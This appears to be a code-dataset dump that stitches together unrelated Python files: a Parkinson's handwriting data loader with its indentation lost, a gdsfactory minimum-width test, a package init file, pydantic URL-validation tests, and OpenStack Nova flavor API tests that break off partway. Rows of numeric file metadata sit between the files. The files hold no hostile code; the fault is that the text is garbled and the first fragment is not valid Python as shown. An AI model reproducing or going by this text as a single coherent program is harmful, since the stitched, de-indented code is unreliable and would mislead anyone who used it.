db=np.array(data)
f=open(filename,'w')
for i,a in enumerate(db):
for p,j in enumerate(db[i]):
if p!=(len(db[i])-1):
f.write(j+",")
else:
f.write(j+"\n")
def readDataFile(filename):
f = open(filename)
data=[]
for i,row in enumerate(f.readlines()):
currentline = row.split(",")
temp=[]
for column_value in currentline:
temp.append(column_value)
data.append(temp)
data=np.array(data)
return data
def allData():
Data=[]
#X_train datalari aktariliyor
work_dir="./data/parkinson/hw_dataset"
folderList=os.listdir(work_dir)
for i,folder_name in enumerate(folderList):
folder=os.listdir(work_dir+"/"+folder_name)
if folder_name=="control":
deger=0
elif folder_name=="parkinson":
deger=1
for file_name in folder:
f = open(work_dir+"/"+folder_name+"/"+file_name)
for i,row in enumerate(f.readlines()):
currentline = row.split(";")
temp=[]
for i,column_value in enumerate(currentline):
if i!=5 and i!=6:
temp.append(column_value)
if i==6:
temp.append(deger)
Data.append(temp)
work_dir="./data/parkinson/new_dataset"
folderList=os.listdir(work_dir)
for i,folder_name in enumerate(folderList):
folder=os.listdir(work_dir+"/"+folder_name)
for file_name in folder:
f = open(work_dir+"/"+folder_name+"/"+file_name)
for i,row in enumerate(f.readlines()):
currentline = row.split(";")
temp=[]
for i,column_value in enumerate(currentline):
if i!=5 and i!=6:
temp.append(column_value)
if i==6:
temp.append(1)
Data.append(temp)
return Data
def SST_Data():
Data=[]
#X_train datalari aktariliyor
work_dir="./data/parkinson/hw_dataset"
folderList=os.listdir(work_dir)
for i,folder_name in enumerate(folderList):
folder=os.listdir(work_dir+"/"+folder_name)
if folder_name=="control":
deger=0
elif folder_name=="parkinson":
deger=1
for file_name in folder:
f = open(work_dir+"/"+folder_name+"/"+file_name)
for i,row in enumerate(f.readlines()):
currentline = row.split(";")
temp=[]
if currentline[6]=="0\n":
for i,column_value in enumerate(currentline):
if i!=5 and i!=6:
temp.append(column_value)
if i==6:
temp.append(deger)
Data.append(temp)
return Data
def DST_Data():
Data=[]
#X_train datalari aktariliyor
work_dir="./data/parkinson/hw_dataset"
folderList=os.listdir(work_dir)
for i,folder_name in enumerate(folderList):
folder=os.listdir(work_dir+"/"+folder_name)
if folder_name=="control":
deger=0
elif folder_name=="parkinson":
deger=1
for file_name in folder:
f = open(work_dir+"/"+folder_name+"/"+file_name)
for i,row in enumerate(f.readlines()):
currentline = row.split(";")
temp=[]
if currentline[6]=="1\n":
for i,column_value in enumerate(currentline):
if i!=5 and i!=6:
temp.append(column_value)
if i==6:
temp.append(deger)
Data.append(temp)
return Data
def STCP_Data():
Data=[]
#X_train datalari aktariliyor
work_dir="./data/parkinson/hw_dataset"
folderList=os.listdir(work_dir)
for i,folder_name in enumerate(folderList):
folder=os.listdir(work_dir+"/"+folder_name)
if folder_name=="control":
deger=0
elif folder_name=="parkinson":
deger=1
for file_name in folder:
f = open(work_dir+"/"+folder_name+"/"+file_name)
for i,row in enumerate(f.readlines()):
currentline = row.split(";")
temp=[]
if currentline[6]=="2\n":
for i,column_value in enumerate(currentline):
if i!=5 and i!=6:
temp.append(column_value)
if i==6:
temp.append(deger)
Data.append(temp)
return Data
def test_sst():
Data=[]
#X_train datalari aktariliyor
work_dir="./data/parkinson/new_dataset"
folderList=os.listdir(work_dir)
for i,folder_name in enumerate(folderList):
folder=os.listdir(work_dir+"/"+folder_name)
for file_name in folder:
f = open(work_dir+"/"+folder_name+"/"+file_name)
for i,row in enumerate(f.readlines()):
currentline = row.split(";")
temp=[]
if currentline[6]=="0\n":
for i,column_value in enumerate(currentline):
if i!=5 and i!=6:
temp.append(column_value)
if i==6:
temp.append(1)
Data.append(temp)
return Data
def test_dst():
Data=[]
#X_train datalari aktariliyor
work_dir="./data/parkinson/new_dataset"
folderList=os.listdir(work_dir)
for i,folder_name in enumerate(folderList):
folder=os.listdir(work_dir+"/"+folder_name)
for file_name in folder:
f = open(work_dir+"/"+folder_name+"/"+file_name)
for i,row in enumerate(f.readlines()):
currentline = row.split(";")
temp=[]
if currentline[6]=="1\n":
for i,column_value in enumerate(currentline):
if i!=5 and i!=6:
temp.append(column_value)
if i==6:
temp.append(1)
Data.append(temp)
return Data
def test_stcp():
Data=[]
#X_train datalari aktariliyor
work_dir="./data/parkinson/new_dataset"
folderList=os.listdir(work_dir)
for i,folder_name in enumerate(folderList):
folder=os.listdir(work_dir+"/"+folder_name)
for file_name in folder:
f = open(work_dir+"/"+folder_name+"/"+file_name)
for i,row in enumerate(f.readlines()):
currentline = row.split(";")
temp=[]
if currentline[6]=="2\n":
for i,column_value in enumerate(currentline):
if i!=5 and i!=6:
temp.append(column_value)
if i==6:
temp.append(1)
Data.append(temp)
return Data
| 34.966667
| 65
| 0.504971
| 842
| 7,343
| 4.26247
| 0.093824
| 0.062413
| 0.057955
| 0.071329
| 0.904152
| 0.904152
| 0.904152
| 0.903037
| 0.903037
| 0.903037
| 0
| 0.013579
| 0.378183
| 7,343
| 210
| 66
| 34.966667
| 0.772449
| 0.037178
| 0
| 0.859459
| 0
| 0
| 0.048044
| 0.031179
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048649
| false
| 0
| 0.010811
| 0
| 0.102703
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7776dabfbee60cb354b3468e21c8f1d14a4bf6d2
| 1,277
|
py
|
Python
|
gdsfactory/tests/test_min_width.py
|
jorgepadilla19/gdsfactory
|
68e1c18257a75d4418279851baea417c8899a165
|
[
"MIT"
] | 42
|
2020-05-25T09:33:45.000Z
|
2022-03-29T03:41:19.000Z
|
gdsfactory/tests/test_min_width.py
|
jorgepadilla19/gdsfactory
|
68e1c18257a75d4418279851baea417c8899a165
|
[
"MIT"
] | 133
|
2020-05-28T18:29:04.000Z
|
2022-03-31T22:21:42.000Z
|
gdsfactory/tests/test_min_width.py
|
jorgepadilla19/gdsfactory
|
68e1c18257a75d4418279851baea417c8899a165
|
[
"MIT"
] | 17
|
2020-06-30T07:07:50.000Z
|
2022-03-17T15:45:27.000Z
|
from typing import Tuple
import gdsfactory as gf
from gdsfactory.geometry import check_width
def test_wmin_failing(layer: Tuple[int, int] = (1, 0)) -> None:
w = 50
min_width = 50 + 10 # component edges are smaller than min_width
c = gf.components.rectangle(size=(w, w), layer=layer)
gdspath = c.write_gds("wmin.gds")
# r = check_width(gdspath, min_width=min_width, layer=layer)
# print(check_width(gdspath, min_width=min_width, layer=layer))
assert check_width(gdspath, min_width=min_width, layer=layer) == 2
assert check_width(c, min_width=min_width, layer=layer) == 2
def test_wmin_passing(layer: Tuple[int, int] = (1, 0)) -> None:
w = 50
min_width = 50 - 10 # component edges are bigger than the min_width
c = gf.components.rectangle(size=(w, w), layer=layer)
gdspath = c.write_gds("wmin.gds")
# print(check_width(c, min_width=min_width, layer=layer))
# assert check_width(gdspath, min_width=min_width, layer=layer) is None
# assert check_width(c, min_width=min_width, layer=layer) is None
assert check_width(gdspath, min_width=min_width, layer=layer) == 0
assert check_width(c, min_width=min_width, layer=layer) == 0
if __name__ == "__main__":
# test_wmin_failing()
test_wmin_passing()
| 36.485714
| 75
| 0.70556
| 200
| 1,277
| 4.255
| 0.23
| 0.206816
| 0.116334
| 0.169213
| 0.776733
| 0.776733
| 0.776733
| 0.772033
| 0.772033
| 0.688602
| 0
| 0.018975
| 0.174628
| 1,277
| 34
| 76
| 37.558824
| 0.788425
| 0.328113
| 0
| 0.315789
| 0
| 0
| 0.028269
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 1
| 0.105263
| false
| 0.105263
| 0.157895
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
77847e9fd796da3bf3903e9d8b98872538ece48b
| 100
|
py
|
Python
|
jsonrouter/__init__.py
|
Benbentwo-Sandbox/jsonrouter
|
7e1d837e590682142e284345086f78402c5c589b
|
[
"MIT"
] | 2
|
2018-12-07T04:42:15.000Z
|
2020-07-17T21:07:27.000Z
|
jsonrouter/__init__.py
|
Benbentwo-Sandbox/jsonrouter
|
7e1d837e590682142e284345086f78402c5c589b
|
[
"MIT"
] | 7
|
2018-12-07T00:37:55.000Z
|
2018-12-19T17:05:27.000Z
|
jsonrouter/__init__.py
|
Benbentwo-Sandbox/jsonrouter
|
7e1d837e590682142e284345086f78402c5c589b
|
[
"MIT"
] | 1
|
2020-05-29T15:19:11.000Z
|
2020-05-29T15:19:11.000Z
|
from .__version__ import __version__
from .__version__ import __version_info__
from .core import *
| 20
| 41
| 0.83
| 12
| 100
| 5.5
| 0.416667
| 0.333333
| 0.515152
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13
| 100
| 4
| 42
| 25
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
778c115746b8d426a7515913089587536dc0adf6
| 13,642
|
py
|
Python
|
tests/test_types_url_str.py
|
pydevd/pydantic
|
cd50601172462b49cdf09e4d988906ba8f14af87
|
[
"MIT"
] | 25
|
2019-06-30T04:37:49.000Z
|
2022-03-19T19:57:37.000Z
|
tests/test_types_url_str.py
|
pydevd/pydantic
|
cd50601172462b49cdf09e4d988906ba8f14af87
|
[
"MIT"
] | 1
|
2018-11-22T15:52:55.000Z
|
2018-11-22T15:57:42.000Z
|
tests/test_types_url_str.py
|
pydevd/pydantic
|
cd50601172462b49cdf09e4d988906ba8f14af87
|
[
"MIT"
] | 4
|
2021-06-25T06:34:49.000Z
|
2022-02-07T01:52:10.000Z
|
import pytest
from pydantic import BaseModel, ValidationError, urlstr
@pytest.mark.parametrize(
'value', [
'http://example.org',
'https://example.org',
'ftp://example.org',
'ftps://example.org',
'http://example.co.jp',
'http://www.example.com/a%C2%B1b',
'http://www.example.com/~username/',
'http://info.example.com/?fred',
'http://xn--mgbh0fb.xn--kgbechtv/',
'http://example.com/blue/red%3Fand+green',
'http://www.example.com/?array%5Bkey%5D=value',
'http://xn--rsum-bpad.example.org/',
'http://123.45.67.8/',
'http://123.45.67.8:8329/',
'http://[2001:db8::ff00:42]:8329',
'http://[2001::1]:8329',
'http://www.example.com:8000/foo',
],
)
def test_url_str_absolute_success(value):
class Model(BaseModel):
v: urlstr(relative=False)
assert Model(v=value).v == value
@pytest.mark.parametrize(
'value,errors', [
(
'http:///example.com/',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'https:///example.com/',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'https://example.org\\',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'ftp:///example.com/',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'ftps:///example.com/',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'http//example.org',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'http:///',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'http:/example.org',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'foo://example.org',
[
{
'loc': ('v',),
'msg': 'url scheme "foo" is not allowed',
'type': 'value_error.url.scheme',
'ctx': {
'scheme': 'foo',
},
},
],
),
(
'../icons/logo.gif',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'http://2001:db8::ff00:42:8329',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'http://[192.168.1.1]:8329',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'abc',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'..',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'/',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
' ',
[
{
'loc': ('v',),
'msg': 'ensure this value has at least 1 characters',
'type': 'value_error.any_str.min_length',
'ctx': {
'limit_value': 1,
},
},
],
),
(
'',
[
{
'loc': ('v',),
'msg': 'ensure this value has at least 1 characters',
'type': 'value_error.any_str.min_length',
'ctx': {
'limit_value': 1,
},
},
],
),
(
None,
[
{
'loc': ('v',),
'msg': 'none is not an allow value',
'type': 'type_error.none.not_allowed',
},
],
),
],
)
def test_url_str_absolute_fails(value, errors):
class Model(BaseModel):
v: urlstr(relative=False)
with pytest.raises(ValidationError) as exc_info:
Model(v=value)
assert exc_info.value.errors() == errors
@pytest.mark.parametrize(
'value', [
'http://example.org',
'http://123.45.67.8/',
'http://example.com/foo/bar/../baz',
'https://example.com/../icons/logo.gif',
'http://example.com/./icons/logo.gif',
'ftp://example.com/../../../../g',
'http://example.com/g?y/./x',
],
)
def test_url_str_relative_success(value):
class Model(BaseModel):
v: urlstr(relative=True)
assert Model(v=value).v == value
@pytest.mark.parametrize(
'value,errors', [
(
'http//example.org',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'suppliers.html',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'../icons/logo.gif',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'\icons/logo.gif',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'../.../g',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'...',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'\\',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
' ',
[
{
'loc': ('v',),
'msg': 'ensure this value has at least 1 characters',
'type': 'value_error.any_str.min_length',
'ctx': {
'limit_value': 1,
},
},
],
),
(
'',
[
{
'loc': ('v',),
'msg': 'ensure this value has at least 1 characters',
'type': 'value_error.any_str.min_length',
'ctx': {
'limit_value': 1,
},
},
],
),
(
None,
[
{
'loc': ('v',),
'msg': 'none is not an allow value',
'type': 'type_error.none.not_allowed',
},
],
),
],
)
def test_url_str_relative_fails(value, errors):
class Model(BaseModel):
v: urlstr(relative=True)
with pytest.raises(ValidationError) as exc_info:
Model(v=value)
assert exc_info.value.errors() == errors
@pytest.mark.parametrize(
'value', [
'http://example.org',
'http://123.45.67.8/',
'http://example',
'http://example.',
'http://example:80',
'http://user.name:pass.word@example',
'http://example/foo/bar',
],
)
def test_url_str_dont_require_tld_success(value):
class Model(BaseModel):
v: urlstr(require_tld=False)
assert Model(v=value).v == value
@pytest.mark.parametrize(
'value,errors', [
(
'http//example',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'http://.example.org',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'http:///foo/bar',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'http:// /foo/bar',
[
{
'loc': ('v',),
'msg': 'url string does not match regex',
'type': 'value_error.url.regex',
},
],
),
(
'',
[
{
'loc': ('v',),
'msg': 'ensure this value has at least 1 characters',
'type': 'value_error.any_str.min_length',
'ctx': {
'limit_value': 1,
},
},
],
),
(
None,
[
{
'loc': ('v',),
'msg': 'none is not an allow value',
'type': 'type_error.none.not_allowed',
},
],
),
],
)
def test_url_str_dont_require_tld_fails(value, errors):
class Model(BaseModel):
v: urlstr(require_tld=False)
with pytest.raises(ValidationError) as exc_info:
Model(v=value)
assert exc_info.value.errors() == errors
def test_url_str_absolute_custom_scheme():
class Model(BaseModel):
v: urlstr(relative=False)
# By default, ws not allowed
url = 'ws://test.test'
with pytest.raises(ValidationError) as exc_info:
Model(v=url)
assert exc_info.value.errors() == [
{
'loc': ('v',),
'msg': 'url scheme "ws" is not allowed',
'type': 'value_error.url.scheme',
'ctx': {
'scheme': 'ws',
},
},
]
class Model(BaseModel):
v: urlstr(relative=False, schemes={'http', 'https', 'ws'})
assert Model(v=url).v == url
def test_url_str_relative_and_custom_schemes():
class Model(BaseModel):
v: urlstr(relative=True)
# By default, ws not allowed
url = 'ws://test.test'
with pytest.raises(ValidationError) as exc_info:
Model(v=url)
assert exc_info.value.errors() == [
{
'loc': ('v',),
'msg': 'url scheme "ws" is not allowed',
'type': 'value_error.url.scheme',
'ctx': {
'scheme': 'ws',
},
},
]
class Model(BaseModel):
v: urlstr(relative=True, schemes={'http', 'https', 'ws'})
assert Model(v=url).v == url
| 26.48932
| 73
| 0.340053
| 1,075
| 13,642
| 4.217674
| 0.113488
| 0.03176
| 0.05558
| 0.061756
| 0.885532
| 0.850684
| 0.838774
| 0.79753
| 0.752095
| 0.73004
| 0
| 0.015674
| 0.508943
| 13,642
| 514
| 74
| 26.540856
| 0.661143
| 0.003885
| 0
| 0.554865
| 0
| 0
| 0.276535
| 0.062785
| 0
| 0
| 0
| 0
| 0.020704
| 1
| 0.016563
| false
| 0.00207
| 0.004141
| 0
| 0.062112
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
77aefe507a742328b14bde4c42c73589537b0312
| 25,875
|
py
|
Python
|
nova/tests/api/openstack/test_flavors.py
|
armaan/nova
|
22859fccb95502efcb73ecf2bd827c45c0886bd3
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/api/openstack/test_flavors.py
|
armaan/nova
|
22859fccb95502efcb73ecf2bd827c45c0886bd3
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/api/openstack/test_flavors.py
|
armaan/nova
|
22859fccb95502efcb73ecf2bd827c45c0886bd3
|
[
"Apache-2.0"
] | null | null | null |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import webob
from lxml import etree
from nova.api.openstack import flavors
import nova.db.api
from nova import exception
from nova import test
from nova.api.openstack import xmlutil
from nova.tests.api.openstack import fakes
from nova import wsgi
NS = "{http://docs.openstack.org/compute/api/v1.1}"
ATOMNS = "{http://www.w3.org/2005/Atom}"
FAKE_FLAVORS = {
'flavor 1': {
"flavorid": '1',
"name": 'flavor 1',
"memory_mb": '256',
"local_gb": '10'
},
'flavor 2': {
"flavorid": '2',
"name": 'flavor 2',
"memory_mb": '512',
"local_gb": '20'
},
}
def fake_instance_type_get_by_flavor_id(context, flavorid):
return FAKE_FLAVORS['flavor %s' % flavorid]
def fake_instance_type_get_all(context, inactive=False, filters=None):
def reject_min(db_attr, filter_attr):
return filter_attr in filters and\
int(flavor[db_attr]) < int(filters[filter_attr])
filters = filters or {}
for flavor in FAKE_FLAVORS.values():
if reject_min('memory_mb', 'min_memory_mb'):
continue
elif reject_min('local_gb', 'min_local_gb'):
continue
yield flavor
def empty_instance_type_get_all(context, inactive=False, filters=None):
return {}
def return_instance_type_not_found(context, flavor_id):
raise exception.InstanceTypeNotFound(flavor_id=flavor_id)
class FlavorsTest(test.TestCase):
def setUp(self):
super(FlavorsTest, self).setUp()
fakes.stub_out_networking(self.stubs)
fakes.stub_out_rate_limiting(self.stubs)
self.stubs.Set(nova.db.api, "instance_type_get_all",
fake_instance_type_get_all)
self.stubs.Set(nova.db.api, "instance_type_get_by_flavor_id",
fake_instance_type_get_by_flavor_id)
def tearDown(self):
self.stubs.UnsetAll()
super(FlavorsTest, self).tearDown()
def test_get_flavor_list_v1_0(self):
req = webob.Request.blank('/v1.0/flavors')
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavors = json.loads(res.body)["flavors"]
expected = [
{
"id": "1",
"name": "flavor 1",
},
{
"id": "2",
"name": "flavor 2",
},
]
self.assertEqual(flavors, expected)
def test_get_empty_flavor_list_v1_0(self):
self.stubs.Set(nova.db.api, "instance_type_get_all",
empty_instance_type_get_all)
req = webob.Request.blank('/v1.0/flavors')
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavors = json.loads(res.body)["flavors"]
expected = []
self.assertEqual(flavors, expected)
def test_get_flavor_list_detail_v1_0(self):
req = webob.Request.blank('/v1.0/flavors/detail')
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavors = json.loads(res.body)["flavors"]
expected = [
{
"id": "1",
"name": "flavor 1",
"ram": "256",
"disk": "10",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
},
{
"id": "2",
"name": "flavor 2",
"ram": "512",
"disk": "20",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
},
]
self.assertEqual(flavors, expected)
def test_get_flavor_by_id_v1_0(self):
req = webob.Request.blank('/v1.0/flavors/1')
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavor = json.loads(res.body)["flavor"]
expected = {
"id": "1",
"name": "flavor 1",
"ram": "256",
"disk": "10",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
}
self.assertEqual(flavor, expected)
def test_get_flavor_by_invalid_id(self):
self.stubs.Set(nova.db.api, "instance_type_get_by_flavor_id",
return_instance_type_not_found)
req = webob.Request.blank('/v1.0/flavors/asdf')
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 404)
def test_get_flavor_by_id_v1_1(self):
req = webob.Request.blank('/v1.1/fake/flavors/1')
req.environ['api.version'] = '1.1'
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavor = json.loads(res.body)
expected = {
"flavor": {
"id": "1",
"name": "flavor 1",
"ram": "256",
"disk": "10",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/1",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/1",
},
],
},
}
self.assertEqual(flavor, expected)
def test_get_flavor_list_v1_1(self):
req = webob.Request.blank('/v1.1/fake/flavors')
req.environ['api.version'] = '1.1'
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavor = json.loads(res.body)
expected = {
"flavors": [
{
"id": "1",
"name": "flavor 1",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/1",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/1",
},
],
},
{
"id": "2",
"name": "flavor 2",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/2",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/2",
},
],
},
],
}
self.assertEqual(flavor, expected)
def test_get_flavor_list_detail_v1_1(self):
req = webob.Request.blank('/v1.1/fake/flavors/detail')
req.environ['api.version'] = '1.1'
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavor = json.loads(res.body)
expected = {
"flavors": [
{
"id": "1",
"name": "flavor 1",
"ram": "256",
"disk": "10",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/1",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/1",
},
],
},
{
"id": "2",
"name": "flavor 2",
"ram": "512",
"disk": "20",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/2",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/2",
},
],
},
],
}
self.assertEqual(flavor, expected)
def test_get_empty_flavor_list_v1_1(self):
self.stubs.Set(nova.db.api, "instance_type_get_all",
empty_instance_type_get_all)
req = webob.Request.blank('/v1.1/fake/flavors')
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavors = json.loads(res.body)["flavors"]
expected = []
self.assertEqual(flavors, expected)
def test_get_flavor_list_filter_min_ram_v1_1(self):
"""Flavor lists may be filtered by minRam"""
req = webob.Request.blank('/v1.1/fake/flavors?minRam=512')
req.environ['api.version'] = '1.1'
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavor = json.loads(res.body)
expected = {
"flavors": [
{
"id": "2",
"name": "flavor 2",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/2",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/2",
},
],
},
],
}
self.assertEqual(flavor, expected)
def test_get_flavor_list_filter_min_disk(self):
"""Flavor lists may be filtered by minRam"""
req = webob.Request.blank('/v1.1/fake/flavors?minDisk=20')
req.environ['api.version'] = '1.1'
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavor = json.loads(res.body)
expected = {
"flavors": [
{
"id": "2",
"name": "flavor 2",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/2",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/2",
},
],
},
],
}
self.assertEqual(flavor, expected)
def test_get_flavor_list_detail_min_ram_and_min_disk_v1_1(self):
"""Tests that filtering work on flavor details and that minRam and
minDisk filters can be combined
"""
req = webob.Request.blank(
'/v1.1/fake/flavors/detail?minRam=256&minDisk=20')
req.environ['api.version'] = '1.1'
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavor = json.loads(res.body)
expected = {
"flavors": [
{
"id": "2",
"name": "flavor 2",
"ram": "512",
"disk": "20",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/2",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/2",
},
],
},
],
}
self.assertEqual(flavor, expected)
def test_get_flavor_list_detail_bogus_min_ram_v1_1(self):
"""Tests that bogus minRam filtering values are ignored"""
req = webob.Request.blank(
'/v1.1/fake/flavors/detail?minRam=16GB')
req.environ['api.version'] = '1.1'
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavor = json.loads(res.body)
expected = {
"flavors": [
{
"id": "1",
"name": "flavor 1",
"ram": "256",
"disk": "10",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/1",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/1",
},
],
},
{
"id": "2",
"name": "flavor 2",
"ram": "512",
"disk": "20",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/2",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/2",
},
],
},
],
}
self.assertEqual(flavor, expected)
def test_get_flavor_list_detail_bogus_min_disk_v1_1(self):
"""Tests that bogus minDisk filtering values are ignored"""
req = webob.Request.blank(
'/v1.1/fake/flavors/detail?minDisk=16GB')
req.environ['api.version'] = '1.1'
res = req.get_response(fakes.wsgi_app())
self.assertEqual(res.status_int, 200)
flavor = json.loads(res.body)
expected = {
"flavors": [
{
"id": "1",
"name": "flavor 1",
"ram": "256",
"disk": "10",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/1",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/1",
},
],
},
{
"id": "2",
"name": "flavor 2",
"ram": "512",
"disk": "20",
"rxtx_cap": "",
"rxtx_quota": "",
"swap": "",
"vcpus": "",
"links": [
{
"rel": "self",
"href": "http://localhost/v1.1/fake/flavors/2",
},
{
"rel": "bookmark",
"href": "http://localhost/fake/flavors/2",
},
],
},
],
}
self.assertEqual(flavor, expected)
class FlavorsXMLSerializationTest(test.TestCase):
def test_xml_declaration(self):
serializer = flavors.FlavorXMLSerializer()
fixture = {
"flavor": {
"id": "12",
"name": "asdf",
"ram": "256",
